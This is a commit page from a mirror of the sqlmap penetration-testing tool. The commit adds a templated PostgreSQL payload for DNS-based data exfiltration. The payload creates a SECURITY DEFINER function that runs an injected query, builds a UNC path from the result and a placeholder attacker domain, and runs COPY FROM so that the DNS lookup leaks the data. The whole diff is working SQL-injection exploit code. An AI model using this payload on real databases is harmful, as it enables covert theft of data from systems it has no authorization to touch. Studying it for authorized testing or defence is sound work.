PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-06 12:41:30 +00:00
Code Issues Projects Releases Wiki Activity

adding support for PgSQL DNS data exfiltration

Browse Source
This commit is contained in:
Miroslav Stampar
2012-04-07 14:06:11 +00:00
parent b2afa87e48
commit 8c6eb4faa9
5 changed files with 27 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

13
procs/postgresql/dns_request.txt Normal file
View File

@@ -0,0 +1,13 @@
DROP TABLE IF EXISTS %RANDSTR1%;
CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
CREATE OR REPLACE FUNCTION %RANDSTR3%()
RETURNS VOID AS $$
DECLARE %RANDSTR4% TEXT;
DECLARE %RANDSTR5% TEXT;
BEGIN
SELECT INTO %RANDSTR5% (%QUERY%);
%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
EXECUTE %RANDSTR4%;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT %RANDSTR3%();